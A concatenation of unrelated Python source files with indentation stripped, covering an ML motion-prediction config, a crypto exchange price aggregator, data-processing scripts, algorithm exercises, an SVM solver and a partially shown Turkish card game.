LEARNING_RATE_DECAY_FACTOR = 0.95
LEARNING_RATE_STEP = 10000
MAX_GRADIENT_NORM = 8
BATCH_SIZE = 30
ITERATIONS = 3600
# Architecture - rnn_GRU
ARCHITECTURE = "prednet" # share encoder decoder parameters
SIZE = 1024
NUM_LAYERS = 1
SEQ_LENGTH_IN = 50
SEQ_LENGTH_OUT = 25
RESIDUAL_VELOCITIES = True
LOSS_TO_USE = 'sampling_based'
# Directories
ROOT_DIR = os.path.normpath(Path(__file__).parent.parent)
DATA_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'data/hri_data/'))
MOGAZE_DATA_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'data/mogaze_data/'))
EXP_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'experiments/results/'))
ACTION = 'combined' # or 'noise', 'co-existing', 'co-operating'
# train parameters
TRAIN_MOGAZE = False
VAL_EVERY = 100
SAVE_EVERY = 100
USE_CPU = False
TRAIN_LOAD = 0
SUB_BATCH_SIZE = 13
MOGAZE_SUB_BATCH_SIZE = 68
MOGAZE_VAL_SUB_BATCH_SIZE = 22
# test parameters
TEST_MOGAZE = False
TEST_LOAD = 1500 # for RED 1500, for PredNet 1800,
TEST_DATA = 'pred_test_noise'
TEST_SUB_BATCH_SIZE = 325
MOGAZE_TEST_SUB_BATCH_SIZE = 2
# data
OUTPUT_QPOS_SIZE = 35
QPOS_SIZE = 34 if AVOID_GOAL else 37
HUMAN_SIZE = 34 # after converting root_orientation quat -> euler
MOGAZE_SIZE = 66
GOAL_SIZE = 3
# ------------------------------------
# variables for chull viz. and vol. occ. error computation
# ------------------------------------
EPISODES = 30
PREDICTION_STEPS = 325 # removed,
TOTAL_STEPS = 350 # 325+25
# CHULL_SCENARIO = 'co-existing'
VIZ_QPOS_CHULL = False
VIZ_VOE_CHULL = True
# ------------------------------------
TRAIN_DIR = None
SUMMARIES_DIR = None
CKPT_DIR = None
CHULL_BASE_DIR = None
DIR_PRED_CHULL_QPOS = None
DIR_DRL_CHULL_QPOS = None
DIR_PRED = None
DIR_DRL = None
DIR_INTERSECTION = None
MOGAZE_NORM_STAT_DIR = None
NORM_STAT_DIR = None
HRI_TEST_DATA_DIR = None
CREATE_MODEL_HRI_FN = None
CREATE_MODEL_MOGAZE_FN = None
LOAD_MODEL_FN = None # function for loading PredNet or RED model
RED_FLAGS_FN = None
HRI_DATA_PATH = os.path.join(DATA_DIR, "hri_scenarios.h5")
def update_experiments_dir():
global TRAIN_DIR, SUMMARIES_DIR, CKPT_DIR, CHULL_BASE_DIR, DIR_PRED_CHULL_QPOS, DIR_DRL_CHULL_QPOS, DIR_PRED, \
DIR_DRL, DIR_INTERSECTION, QPOS_SIZE, MOGAZE_NORM_STAT_DIR, NORM_STAT_DIR, HRI_TEST_DATA_DIR, \
CREATE_MODEL_HRI_FN, CREATE_MODEL_MOGAZE_FN, LOAD_MODEL_FN, RED_FLAGS_FN, TEST_LOAD
avoid_goal_str = "_avoid_goal" if AVOID_GOAL else ""
TRAIN_DIR = os.path.normpath(os.path.join(EXP_DIR,
"models",
ARCHITECTURE,
'{}{}'.format(ACTION, avoid_goal_str),
# 'out_{0}'.format(SEQ_LENGTH_OUT),
# 'iterations_{0}'.format(ITERATIONS),
# "tied",
# LOSS_TO_USE,
# 'depth_{0}'.format(NUM_LAYERS),
# 'size_{0}'.format(SIZE),
# 'lr_{0}'.format(LEARNING_RATE),
# 'residual_vel' if RESIDUAL_VELOCITIES else 'not_residual_vel'
))
SUMMARIES_DIR = os.path.normpath(os.path.join(TRAIN_DIR, "log")) # Directory for TB summaries
CKPT_DIR = TRAIN_DIR # os.path.normpath(TRAIN_DIR, 'model_ckpt')
if (ACTION == "combined" or ACTION == "p1_1") and AVOID_GOAL:
CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION + '_avoid_goal')
elif AVOID_GOAL:
CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION, 'avoid_goal')
else:
CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION)
# qpos data dir
DIR_PRED_CHULL_QPOS = os.path.join(CHULL_BASE_DIR, 'pred_chull_viz', 'qpos')
DIR_DRL_CHULL_QPOS = os.path.join(CHULL_BASE_DIR, 'drl_chull_viz', 'qpos')
# mesh_files dir
DIR_PRED = os.path.join(CHULL_BASE_DIR, 'pred_chull_viz', 'mesh_files')
DIR_DRL = os.path.join(CHULL_BASE_DIR, 'drl_chull_viz', 'mesh_files')
DIR_INTERSECTION = os.path.join(CHULL_BASE_DIR, 'intersection_meshes')
HRI_TEST_DATA_DIR = os.path.join(DATA_DIR, ACTION, 'test_all')
if ARCHITECTURE == "prednet":
MOGAZE_NORM_STAT_DIR = os.path.join(MOGAZE_DATA_DIR, 'norm_stat/')
NORM_STAT_DIR = os.path.join(DATA_DIR, ACTION, 'norm_stat/')
QPOS_SIZE = 34 if AVOID_GOAL else 37
from models.prednet.train_prednet import create_model
CREATE_MODEL_HRI_FN = create_model
CREATE_MODEL_MOGAZE_FN = create_model
from models.prednet.prednet_model import PredNet
LOAD_MODEL_FN = PredNet.load_model
if ACTION == "p1_1":
TEST_LOAD = 6000 # for RED 1500, for PredNet 1800,
elif ACTION == "combined":
if AVOID_GOAL:
TEST_LOAD = 3000 # for RED 1500, for PredNet 1800,
else:
TEST_LOAD = 1800 # for RED 1500, for PredNet 1800,
elif ACTION == "co-operating":
TEST_LOAD = 3500 # for RED 1500, for PredNet 1800,
elif ACTION == "co-existing":
TEST_LOAD = 900 # for RED 1500, for PredNet 1800,
elif ACTION == "noise":
TEST_LOAD = 1300 # for RED 1500, for PredNet 1800,
else:
raise Exception("Unknown action {}".format(ACTION))
else:
MOGAZE_NORM_STAT_DIR = os.path.join(MOGAZE_DATA_DIR, 'norm_stat_red/')
NORM_STAT_DIR = os.path.join(DATA_DIR, ACTION, 'norm_stat_red/')
QPOS_SIZE = 37
if ACTION == "p1_1":
from models.red.Mogaze.mogaze_translate import create_model as red_mogaze_create_model, create_flags
CREATE_MODEL_MOGAZE_FN = red_mogaze_create_model
RED_FLAGS_FN = create_flags
TEST_LOAD = 6000 # for RED 1500, for PredNet 1800,
else:
from models.red.HRI_Scenario.HRI_translate import create_model as red_hri_create_model, create_flags
CREATE_MODEL_HRI_FN = red_hri_create_model
RED_FLAGS_FN = create_flags
TEST_LOAD = 1500 # for RED 1500, for PredNet 1800,
from models.red.red_utils import load_model
LOAD_MODEL_FN = load_model
update_experiments_dir()
|
import coins
class exchange:
def __init__(self,exchange_url:str,exchange_name:str):
self.exchange_ticker=exchange_url
self.supported_coins= []
self.name = exchange_name
self.maker_fee = 0
self.taker_fee = 0
self.bitcoin = None
self.ethereum = None
self.tezos = None
self.link = None
self.stellar = None
self.cosmos = None
self.usdt = None
def populate_coin_list(self):
self.supported_coins.append(self.bitcoin)
self.supported_coins.append(self.ethereum)
self.supported_coins.append(self.tezos)
self.supported_coins.append(self.link)
self.supported_coins.append(self.stellar)
self.supported_coins.append(self.cosmos)
self.supported_coins.append(self.usdt)
def get_supported_coins(self):
return self.supported_coins
def refresh(self):
response = requests.get(self.exchange_ticker)
resp_json = json.loads(response.text)
self.get_bid_prices(resp_json)
self.get_ask_prices(resp_json)
def get_name(self)->str:
return self.name
def get_bid_prices(self,response_json:dict):
pass
def get_ask_prices(self,response_json:dict):
pass
def get_maker_fee(self):
return self.maker_fee
def get_taker_fee(self):
return self.taker_fee
import requests,json
class PARIBU(exchange):
def __init__(self,exchange_url:str = 'https://www.paribu.com/ticker'):
super().__init__(exchange_url,"PARIBU")
self.maker_fee = (0.25 / 100)
self.taker_fee = (0.35 / 100)
self.bitcoin = coins.Bitcoin(0.0005)
self.ethereum = coins.Ethereum(0)
self.tezos = coins.Tezos(0)
self.link = coins.Link(0)
self.stellar = coins.Stellar(0)
self.cosmos = coins.Cosmos(0)
self.usdt = coins.USDT(0)
self.populate_coin_list()
def get_supported_coins(self):
return super().get_supported_coins()
def populate_coin_list(self):
super().populate_coin_list()
def refresh(self):
super().refresh()
def get_bid_prices(self,response_json:dict):
self.bitcoin.set_bid(float(response_json['BTC_TL']['highestBid']))
self.ethereum.set_bid(float(response_json['ETH_TL']['highestBid']))
self.tezos.set_bid(float(response_json['XTZ_TL']['highestBid']))
self.link.set_bid(float(response_json['LINK_TL']['highestBid']))
self.stellar.set_bid(float(response_json['XLM_TL']['highestBid']))
self.cosmos.set_bid(float(response_json['ATOM_TL']['highestBid']))
self.usdt.set_bid(float(response_json['USDT_TL']['highestBid']))
def get_ask_prices(self,response_json:dict):
self.bitcoin.set_ask(float(response_json['BTC_TL']['lowestAsk']))
self.ethereum.set_ask(float(response_json['ETH_TL']['lowestAsk']))
self.tezos.set_ask(float(response_json['XTZ_TL']['lowestAsk']))
self.link.set_ask(float(response_json['LINK_TL']['lowestAsk']))
self.stellar.set_ask(float(response_json['XLM_TL']['lowestAsk']))
self.cosmos.set_ask(float(response_json['ATOM_TL']['lowestAsk']))
self.usdt.set_ask(float(response_json['USDT_TL']['highestBid']))
class BTCTURK(exchange):
def __init__(self,exchange_url:str = 'https://api.btcturk.com/api/v2/ticker'):
super().__init__(exchange_url,"BTCTURK")
self.maker_fee = (0.10 / 100)
self.taker_fee = (0.18 / 100)
self.bitcoin = coins.Bitcoin(0)
self.ethereum = coins.Ethereum(0)
self.tezos = coins.Tezos(0)
self.link = coins.Link(0)
self.stellar = coins.Stellar(0)
self.cosmos = coins.Cosmos(0)
self.usdt = coins.USDT(0)
self.populate_coin_list()
def get_supported_coins(self):
return super().get_supported_coins()
def populate_coin_list(self):
super().populate_coin_list()
def refresh(self):
super().refresh()
def get_bid_prices(self,response_json:dict):
self.bitcoin.set_bid(float(response_json['data'][0]['bid']))
self.tezos.set_bid(float(response_json['data'][30]['bid']))
self.link.set_bid(float(response_json['data'][24]['bid']))
self.ethereum.set_bid(float(response_json['data'][2]['bid']))
self.cosmos.set_bid(float(response_json['data'][27]['bid']))
self.stellar.set_bid(float(response_json['data'][10]['bid']))
self.usdt.set_bid(float(response_json['data'][5]['bid']))
def get_ask_prices(self,response_json:dict):
self.bitcoin.set_ask(float(response_json['data'][0]['ask']))
self.tezos.set_ask(float(response_json['data'][30]['ask']))
self.link.set_ask(float(response_json['data'][24]['ask']))
self.ethereum.set_ask(float(response_json['data'][2]['ask']))
self.cosmos.set_ask(float(response_json['data'][27]['ask']))
self.stellar.set_ask(float(response_json['data'][10]['ask']))
self.usdt.set_ask(float(response_json['data'][5]['ask']))
class KRAKEN(exchange):
def __init__(self,exchange_url:str = 'https://api.kraken.com/0/public/Ticker?pair=xbteur,xtzeur,linkeur,etheur,atomeur,xlmeur,usdteur'):
super().__init__(exchange_url,"KRAKEN")
self.maker_fee = (0.16 / 100)
self.taker_fee = (0.26 / 100)
self.bitcoin = coins.Bitcoin(0.0005)
self.ethereum = coins.Ethereum(0.005)
self.tezos = coins.Tezos(0.2)
self.link = coins.Link(0.12)
self.stellar = coins.Stellar(0.00002)
self.cosmos = coins.Cosmos(0.1)
self.usdt = coins.USDT(5)
self.populate_coin_list()
def get_supported_coins(self):
return super().get_supported_coins()
def populate_coin_list(self):
super().populate_coin_list()
def refresh(self):
super().refresh()
def get_bid_prices(self,response_json:dict):
self.bitcoin.set_bid(float(response_json['result']['XXBTZEUR']['b'][0]))
self.tezos.set_bid(float(response_json['result']['XTZEUR']['b'][0]))
self.link.set_bid(float(response_json['result']['LINKEUR']['b'][0]))
self.ethereum.set_bid(float(response_json['result']['XETHZEUR']['b'][0]))
self.cosmos.set_bid(float(response_json['result']['ATOMEUR']['b'][0]))
self.stellar.set_bid(float(response_json['result']['XXLMZEUR']['b'][0]))
self.usdt.set_bid(float(response_json['result']['USDTEUR']['b'][0]))
def get_ask_prices(self,response_json:dict):
self.bitcoin.set_ask(float(response_json['result']['XXBTZEUR']['a'][0]))
self.tezos.set_ask(float(response_json['result']['XTZEUR']['a'][0]))
self.link.set_ask(float(response_json['result']['LINKEUR']['a'][0]))
self.ethereum.set_ask(float(response_json['result']['XETHZEUR']['a'][0]))
self.cosmos.set_ask(float(response_json['result']['ATOMEUR']['a'][0]))
self.stellar.set_ask(float(response_json['result']['XXLMZEUR']['a'][0]))
self.usdt.set_ask(float(response_json['result']['USDTEUR']['b'][0]))
class BINANCE(exchange):
def __init__(self,exchange_url:str = 'https://api.binance.com/api/v3/ticker/bookTicker'):
super().__init__(exchange_url,"BINANCE")
self.maker_fee = (0.10 / 100)
self.taker_fee = (0.10 / 100)
self.bitcoin = coins.Bitcoin(0.0004)
self.ethereum = coins.Ethereum(0.008)
self.populate_coin_list()
def get_supported_coins(self):
return super().get_supported_coins()
def populate_coin_list(self):
super().populate_coin_list()
def refresh(self):
super().refresh()
def get_bid_prices(self,response_json:dict):
for coin_dictionary in response_json:
if coin_dictionary['symbol'] == 'BTCEUR':
self.bitcoin.set_bid(float(coin_dictionary['bidPrice']))
if coin_dictionary['symbol'] == 'ETHEUR' :
self.ethereum.set_bid(float(coin_dictionary['bidPrice']))
def get_ask_prices(self,response_json:dict):
for coin_dictionary in response_json:
if coin_dictionary['symbol'] == 'BTCEUR':
self.bitcoin.set_ask(float(coin_dictionary['askPrice']))
if coin_dictionary['symbol'] == 'ETHEUR' :
self.ethereum.set_ask(float(coin_dictionary['askPrice']))
class exchange_aggregator:
def __init__(self):
self.paribu = PARIBU()
self.kraken = KRAKEN()
self.btcturk = BTCTURK()
self.binance = BINANCE()
self.euro_exchange_list= [
self.kraken,
self.binance
]
self.try_exchange_list= [
self.paribu,
self.btcturk,
]
def get_turkish_exchanges_list(self) -> exchange:
return self.try_exchange_list
def get_european_exchanges_list(self) -> exchange:
return self.euro_exchange_list |
from bs4 import BeautifulSoup
from urllib.request import urlopen
response = urlopen("https://en.wikipedia.org/wiki/Main_Page")
soup = BeautifulSoup(response, 'html.parser')
i = 1
for anchor in soup.find_all("a"):
print(str(i) + ' ' + anchor.get('href', '/'))
i = i+1 |
#!/usr/bin/env python
"""
===============
%(PROG)s
===============
-------------------------------------------------------------
Collapse multiple rows having the same key into a single row
-------------------------------------------------------------
:Author: skipm@trdlnk.com
:Date: 2016-08-26
:Copyright: TradeLink LLC 2016
:Version: 0.1
:Manual section: 1
:Manual group: data filters
SYNOPSIS
========
%(PROG)s -k f1,f2,f3,...
OPTIONS
=======
-k names comma-separated list of field names
DESCRIPTION
===========
For each row in stdin which has identical values for the given key(s),
collapse them into one row. Values in later rows overwrite values in
earlier rows. Output is to stdout. To be collapsed, rows with
identical key(s) must be adjacent to one another.
EXAMPLE
=======
Given this CSV file:
time,pos1,pos2,pos3
11:00,,-1,3
12:00,1,,1
12:00,,1,2
running csvcollapse -k time will emit this CSV file to stdout:
time,pos1,pos2,pos3
11:00,,-1,3
12:00,1,1,2
This program is often used to collapse rows with common keys in the
output of csvmerge.
SEE ALSO
========
* csvmerge
* csv2csv
"""
from __future__ import absolute_import
from __future__ import print_function
import csv
import sys
import getopt
import os
PROG = os.path.split(sys.argv[0])[1]
def usage(msg=None):
if msg is not None:
print(msg, file=sys.stderr)
print(file=sys.stderr)
print((__doc__.strip() % globals()), file=sys.stderr)
def main(args):
keys = ()
opts, _args = getopt.getopt(args, "k:h")
for opt, arg in opts:
if opt == "-k":
keys = tuple(arg.split(","))
elif opt == "-h":
usage()
return 0
last = ()
result = {}
reader = csv.DictReader(sys.stdin)
writer = csv.DictWriter(sys.stdout, fieldnames=reader.fieldnames)
writer.writeheader()
for row in reader:
row_key = []
for k in keys:
row_key.append(row.get(k))
row_key = tuple(row_key)
if row_key != last:
last = row_key
if result:
writer.writerow(result)
result.clear()
for key in row:
if row[key]:
result[key] = row[key]
if result:
writer.writerow(result)
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
import subprocess
from adb_interaction import ADB
import adb_keyevents
import time
adb = ADB("evolve")
adb.adb_connect("10.100.15.158")
subprocess.call("adb connect 10.100.15.172")
subprocess.call("adb devices",shell=True)
subprocess.call("adb install -r WatchTV-debug.apk")
|
from ..PulsePrimitives import *
from ..Compiler import compile_to_hardware
from ..PulseSequencePlotter import plot_pulse_files
import QGL.PulseShapes
def RabiAmp(qubit, amps, phase=0, showPlot=False):
"""
Variable amplitude Rabi nutation experiment.
Parameters
----------
qubit : logical channel to implement sequence (LogicalChannel)
amps : pulse amplitudes to sweep over (iterable)
phase : phase of the pulse (radians)
showPlot : whether to plot (boolean)
Returns
-------
plotHandle : handle to plot window to prevent destruction
"""
seqs = [[Utheta(qubit, amp=amp, phase=phase), MEAS(qubit)] for amp in amps]
fileNames = compile_to_hardware(seqs, 'Rabi/Rabi')
print(fileNames)
if showPlot:
plotWin = plot_pulse_files(fileNames)
return plotWin
def RabiWidth(qubit, widths, amp=1, phase=0, shapeFun=QGL.PulseShapes.tanh, showPlot=False):
"""
Variable pulse width Rabi nutation experiment.
Parameters
----------
qubit : logical channel to implement sequence (LogicalChannel)
widths : pulse widths to sweep over (iterable)
phase : phase of the pulse (radians, default = 0)
shapeFun : shape of pulse (function, default = PulseShapes.tanh)
showPlot : whether to plot (boolean)
Returns
-------
plotHandle : handle to plot window to prevent destruction
"""
seqs = [[Utheta(qubit, length=l, amp=amp, phase=phase, shapeFun=shapeFun), MEAS(qubit)] for l in widths]
fileNames = compile_to_hardware(seqs, 'Rabi/Rabi')
print(fileNames)
if showPlot:
plotWin = plot_pulse_files(fileNames)
return plotWin
|
# coding:utf-8
# Remove Duplicates from Sorted Array 从排序的数组中删除重复项
nums=map(int,raw_input().split())
def removeDuplicates(nums):
"""
:type nums: List[int]
:rtype: int
"""
n=len(nums)
if n<=1:
return n
else:
p=1
for i in range(1,n):
if nums[p]==nums[p-1]:
del nums[p]
else:
p+=1
return p
print removeDuplicates(nums)
"""
1 1 2 3 2
3
题目:
给定一个排序数组,删除重复的位置,使每个元素只出现一次并返回新的长度。
不要为另一个数组分配额外的空间,必须使用常量内存来做到这一点。
例如,
给定输入数组nums = [1,1,2]
您的函数应返回length = 2,num的前两个元素分别为1和2。超出了新的长度也没关系。
分析:
不能直接返回len(set(nums)),因为测试时要对比nums,而不只是len
""" |
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
def clean_data(df):
df=df.rename(columns = {'artist':'artist_long'})
try:
df["artist"] = df["artist_long"].map(lambda x : x.split('featuring')[0])
except:
df["artist"] = df["artist_long"].map(lambda x : x)
df["ID"] = df["song"] + "%" + df["artist"]
col_name = ['date','rank','ID','song','artist']
df = df[~df['artist'].isnull()]
df = df[~df['song'].isnull()]
return df[col_name]#.drop_duplicates()
# In[3]:
def remove_duplicates(df_clean):
df_clean = df_clean[(df_clean['ID'] != "Heartless%KANYE WEST") | (df_clean['date'] != "2009-06-06") | (df_clean['rank'] != 79)]
return df_clean
# In[4]:
def wide_pivot(df_long):
df= df_long.pivot('ID', 'date', 'rank')
df["ID"] = df.index
df["song"] = df["ID"].map(lambda x : x.split('%')[0])
df["artist"] = df["ID"].map(lambda x : x.split('%')[1])
df.fillna(101,inplace=True)
df.columns = [range(len(df.columns)-3)+['ID', 'song', 'artist']]
#df.index = range(len(df))
#df["IDN"] = df.index
return df
# In[5]:
def get_est_form(df, n=4):
data = []
for k in xrange(len(df)):
df_row = df[df.index == df.index[k]]
for i in xrange(len(df.columns)-n-3):
ser = [df_row[j].values[0] for j in range(i, i+n+1)]
if np.product(np.array(ser) <101) == 1:
diff = []
for i in range(len(ser)-1):
if ser[i+1]-ser[i] > 0:
value = -1
elif ser[i+1]-ser[i] < 0:
value = 1
else:
value = 0
diff.append(value)
data.append(diff[:-1] + [ser[n-1]] + [diff[-1]])
result = pd.DataFrame(data)
result.columns = [["diff_{}".format(i) for i in range(result.shape[1]-2)] + ['rank','target']]
file_name = "pattern_{}.csv".format(n)
result.to_csv(file_name, sep=',', encoding='utf-8')
return result
# In[6]:
def get_ngram_form(df, n=4, name="../data/ngram"):
data = []
for k in xrange(len(df)):
df_row = df[df.index == df.index[k]]
for i in xrange(len(df.columns)-n-3):
ser = [df_row[j].values[0] for j in range(i, i+n+1)]
ser1 = ser[0:-1]
if np.product(np.array(ser1) <101) == 1:
data.append(ser)
result = pd.DataFrame(data)
result.columns = [["diff_{}".format(i) for i in range(result.shape[1]-1)] + ['target']]
file_name = name+"_{}.csv".format(n)
result.to_csv(file_name, sep=',', encoding='utf-8')
return result
# # Run code
# ### Get data with type of ngram ( number in ngram = order)
# In[7]:
df_raw = pd.read_csv("../data/billboard_result_19900106_20091226.csv")
#df_raw = pd.read_csv("../data/billboard_result_20100102_20160423.csv")
df_clean = clean_data(df_raw)
df_clean = remove_duplicates(df_clean)
df = wide_pivot(df_clean)
for i in range(1, 11):
print "i: {}".format(i)
get_ngram_form(df, n=i, name="../data/ngram_1990_2009")
# In[ ]:
|
"""
set
list
tuple
set
dictionary (dict)
"""
# 1st
# 'apple'
# 2nd
# 'pineapple'
# 3rd
# 'orange'
fruitset = {'apple','pineapple','orange'}
print(fruitset)
# unordered collection of items
# it cannot hold duplicated items
# unique item
numberset = {1,1,4,4,6,6}
print(numberset)
# how to create an empty set
set1 = {}
print(set1, type(set1))
set2 = set()
print(set2, type(set2))
# set itself is mutable (changeable)
# items in a set are immutable (unchangeable)
set3 = {'a',1,True,('a','b')}
print(set3)
# set4 = {'a',2,True, ['a','b']}
|
import numpy as np
import random as rnd
import time as tm
from matplotlib import pyplot as plt
import math
# You may define any new functions, variables, classes here
# For example, functions to calculate next coordinate or step length
# def steplength(eta, t):
# return eta/t
def grad(theta, C, X, y):
(n, d) = X.shape
# print(w)
i = rnd.randint(0, n-1)
x = X[i,:]
# print(x)
discriminant = (x.dot(theta)) * y[i]
g = 0
# print(discriminant)
if discriminant < 1:
g = 2*(1 - discriminant)
# print(x)
return theta - (C * n * x * g * y[i])
def batch_grad(theta, C, X, y, B):
(n, d) = X.shape
samples = rnd.sample( range(0, n), B )
X_ = X[samples,:]
y_ = y[samples]
discriminant = np.multiply((X_.dot(theta)), y_)
g = np.zeros( (B,) )
g[discriminant < 1] = -1
return theta + C * (n/B) * 2 * (g * X_.T).dot(np.multiply(y_, (1 - discriminant)))
# if discriminant < 1:
# g =
# return theta - (C * (n/B) * (X_.T * g).dot(y_))
def getObj( X, y, theta, C):
w = theta[0:-1]
hingeLoss = np.maximum( 1 - np.multiply( (X.dot( theta )), y ), 0 )
return 0.5 * w.dot( w ) + C * hingeLoss.dot( hingeLoss )
def solver1( X, y, C, timeout, spacing ):
(n, d) = X.shape
X = np.c_[X, np.ones(n)]
d = d + 1
t = 0
totTime = 0
totalTime = 0
# w is the normal vector and b is the bias
# These are the variables that will get returned once timeout happens
# w = np.zeros( (d-1,) )
# b = 0
tic = tm.perf_counter()
theta = np.zeros( (d,) )
cumulative = theta
w = theta[0:-1]
b = theta[-1]
eta = 0.000003
B = 500
obj_SGD = np.array([getObj(X, y, theta, C)])
time_SGD = np.array([0])
while True:
t = t + 1
if t % spacing == 0:
toc = tm.perf_counter()
totTime = totTime + (toc - tic)
if totTime > timeout:
# plt.plot( time_SGD, obj_SGD, color = 'r', linestyle = '-', label = "SGD" )
# plt.xlabel( "Elapsed time (sec)" )
# plt.ylabel( "C-SVM Objective value" )
# plt.legend()
# plt.ylim( 0, 20000 )
# # plt.xlim( 0, timeout )
# plt.show()
# print(t)
return (w, b, totTime, obj_SGD, time_SGD)
else:
tic = tm.perf_counter()
tic1 = tm.perf_counter()
# thetanew = theta - (grad(theta, C, X, y) * (eta/t))
theta = theta - (batch_grad(theta, C, X, y, B) * (eta))
# wnew = thetanew[0:-1]
# bnew = thetanew[-1]
# prev = getObj( X, y, theta, C )
# new = getObj( X, y, thetanew, C )
# print(new)
# print(new, prev)
# if new > prev:
# eta = eta/2
# continue
# theta = thetanew
toc1 = tm.perf_counter()
totalTime = totalTime + toc1 - tic1
obj_SGD = np.append(obj_SGD, getObj(X, y, theta, C))
time_SGD = np.append(time_SGD, totalTime)
# cumulative = cumulative + theta
w = theta[0:-1]
b = theta[-1]
return (w, b, totTime) # This return statement will never be reached
# C = 1 |
"""
# Definition for a Node.
class Node(object):
def __init__(self, val=None, children=None):
self.val = val
self.children = children
"""
class Solution(object):
def preorder(self, root):
"""
:type root: Node
:rtype: List[int]
"""
res = []
def recursive(node):
if not node:
return
res.append(node.val)
for i in node.children:
recursive(i)
recursive(root)
return res
# iteratively method
def preorder(self, root):
"""
:type root: Node
:rtype: List[int]
"""
from collections import deque
res = []
if not root: return res
d = deque()
d.append(root)
while d:
pop = d.pop()
res.append(pop.val)
d.extend(pop.children[::-1])
return res
|
class Tur_normalgame:
def __init__(self,oyuncu_el):
self.oyuncu = oyuncu_el
time.sleep(1)
print("\n\tTur sende")
global oyun_raporu
oyun_raporu += "\n\tTur sende\n"
time.sleep(1)
print("\n\tortanın değeri:\n\t{} {}".format(orta.type,orta.value))
oyun_raporu += "\n\tortanın değeri:\n\t{} {}\n".format(orta.type,orta.value)
time.sleep(2)
print("\n\tElinde {} kart var".format(len(self.oyuncu.cards)))
oyun_raporu += "\n\tElinde {} kart var\n".format(len(self.oyuncu.cards))
time.sleep(1)
print("\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\t{}\n".format([k.name for k in self.oyuncu.cards])
self.olasi_hamleleri_bul_ng()
time.sleep(3)
if orta.value == 7:
cards_7 = []
for card in self.oyuncu.cards:
if card.value == 7:
cards_7.append(card)
kontrolt3 = 0
while kontrolt3 < 1:
cevap_tur3 = str(input("\n\tOyna!\n\t< kart çek / kart oyna >\n\t")).lower()
cevap_tur3.strip()
if cevap_tur3 == "kart çek":
kontrolt3 = 1
self.kart_cek_user_ng(orta.ortadaki_kart.mark7)
self.olasi_hamleleri_bul_ng()
elif cevap_tur3 == "kart oyna":
kontrolt3 = 1
kontrol_r3 = self.hamle_sec_user_ng7(cards_7)
if kontrol_r3 == 0:
kontrolt3 = 0
else:
kontrol_r3.mark7 += orta.ortadaki_kart.mark7
self.kart_oyna_user_ng(kontrol_r3)
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
kontrolt1 = 0
kontrolt2 = 0
while kontrolt1 < 1:
cevap_tur1 = str(input("\n\tOyna!\n\t< kart çek / kart oyna >\n\t")).lower()
cevap_tur1.strip()
if cevap_tur1 == "kart çek":
kontrolt1 = 1
self.kart_cek_user_ng(1)
self.olasi_hamleleri_bul_ng()
elif cevap_tur1 == "kart oyna":
kontrolt1 = 1
kontrol_r1 = self.hamle_sec_user_ng()
if kontrol_r1 == 0:
kontrolt1 = 0
else:
self.kart_oyna_user_ng(kontrol_r1)
kontrolt2 = 1
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
while kontrolt2 < 1:
cevap_tur2 = str(input("\n\tOyna!\n\t< kart oyna / turu bitir>\n\t")).lower()
cevap_tur2.strip()
if cevap_tur2 == "kart oyna":
kontrolt2 = 1
kontrol_r1 = self.hamle_sec_user_ng()
if kontrol_r1 == 0:
kontrolt2 = 0
else:
self.kart_oyna_user_ng(kontrol_r1)
elif cevap_tur2 == "turu bitir":
kontrolt2 = 1
time.sleep(1)
print("\n\tTurun bitti.\n")
else:
print("\n\tGeçerli bir cevap vermedin")
time.sleep(1)
print("\n\tBir daha dene")
time.sleep(1)
def olasi_hamleleri_bul_ng(self):
global oyun_raporu
self.hamleler = []
for card in self.oyuncu.cards:
if card.type == orta.type:
self.hamleler.append(card)
elif card.value == orta.value:
self.hamleler.append(card)
elif card.value == "vale":
self.hamleler.append(card)
if i < 4:
hamleler_ilk_tur = []
for card in self.hamleler:
if card.type != "sinek":
continue
if card.value == "as" or card.value == 7 or card.value == 10 or card.value == "vale":
continue
hamleler_ilk_tur.append(card)
self.hamleler = hamleler_ilk_tur
oyun_raporu += "olası hamleler: {}\n".format([h.name for h in self.hamleler])
def kart_cek_user_ng(self,a):
global deck
global oyun_raporu
try:
global orta
time.sleep(1)
oyun_raporu += "\ndeste uzunluğu, kart çekemeden önce: {}\n".format(len(deck))
cards_to_be_drawn = [deck.pop(0) for i in range(a)]
self.oyuncu.cards.extend(cards_to_be_drawn)
print("\n\t{} kart çektin".format(a))
oyun_raporu += "\n\t{} kart çektin\n".format(a)
time.sleep(1)
oyun_raporu += "deste uzunluğu, kart çektiktikten sonra: {}\n".format(len(deck))
print("\n\tÇektiğin kartlar\n\t{}".format([k.name for k in cards_to_be_drawn]))
oyun_raporu += "\n\tÇektiğin kartlar\n\t{}\n".format([k.name for k in cards_to_be_drawn])
if len(deck) < 8:
print("\ndestedeki kart sayısı: {}".format(len(deck)))
oyun_raporu += "\ndestedeki kart sayısı: {}\n".format(len(deck))
oyun_raporu += "ortadaki kart sayısı: {}\n".format(len(orta.ortada))
temporary_deck1 = orta.ortada[1:-1]
temporary_deck1 = shuffle_deck(temporary_deck1)
deck.extend(temporary_deck1)
Orta.ortada = [orta.ortada[0],orta.ortada[-1]]
for card in deck:
card.mark10 = ""
card.markAS = ""
card.mark7 = 2
print("ortadaki kağıtlar karılıp yeni deste yapıldı")
oyun_raporu += "ortadaki kağıtlar karılıp yeni deste yapıldı\n"
time.sleep(1)
print("destedeki kart sayısı:",len(deck))
oyun_raporu += "destedeki kart sayısı: {}\n".format(len(deck))
oyun_raporu += "Deste: {}\n".format([k.name for k in deck])
oyun_raporu += "ortada kalanlar: {}\n".format([k.name for k in orta.ortada])
time.sleep(2)
except Exception as hata :
